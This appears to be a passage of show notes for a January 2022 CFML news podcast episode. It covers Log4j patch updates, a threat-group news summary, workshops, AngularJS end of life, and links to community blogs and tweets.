Modernize or Die® - CFML News for January 11th, 2022 - Episode 130

2022-01-11 Weekly News - Episode 130

Watch the video version on YouTube at https://youtu.be/BkIKAlDLFkQ

Hosts:
Gavin Pickin - Senior Software Developer for Ortus Solutions
Eric Peterson  - Senior Software Developer for Ortus Solutions

Thanks to our Sponsor - Ortus Solutions

The makers of ColdBox, CommandBox, ForgeBox, TestBox and almost every other Box out there. 
A few ways  to say thanks back to Ortus Solutions:

Like and subscribe to our videos on YouTube. Subscribe to our Podcast on your Podcast Apps and leave us a reviewSign up for a free or paid account on CFCasts, which is releasing new content every weekBuy Ortus’s Book - 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips)

Patreon Support

We have 37 patreons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site: https://www.patreon.com/ortussolutions.

News and Events

Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley

January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today: https://www.ortussolutions.com/events/webinars

Log4j Updates

Log4j-2.17.1 patch released. CommandBox images updates with the latest log4j patched jars
Adobe updated have an updated technote: https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries like Spreadsheet-CFML have updated as well.
Note: ​Log4j2 Support in lucee 5.3 is coming along for 5.3.9

‘Elephant Beetle’ Lurks for Months in Networks

The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI

Adobe Workshops

More Adobe #ColdFusion Workshops announced, lead by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST

March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST

https://cf-workshop.meetus.adobeevents.com/

AngularJS EOL’ed 12/31/2021

As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue

CFCasts Content Updates

https://www.cfcasts.com 

Just Released

Into the Box 2021 are now all FREE - https://cfcasts.com/series/into-the-box-2021

Coming soon

Into the Box LATAM

Send your suggestions at https://cfcasts.com/support

Conferences and Training

VueJS Nation Conference

Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/

More conferences
Need more conferences, this site has a huge list of conferences for almost any language/community.
https://confs.tech/

Blogs, Tweets and Videos of the Week

Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `<cfoutput encodefor="html">` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron

Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover

Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace.)
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17

Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml
#lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster

Blog - Ben Nadel - Building An API Client With The fet...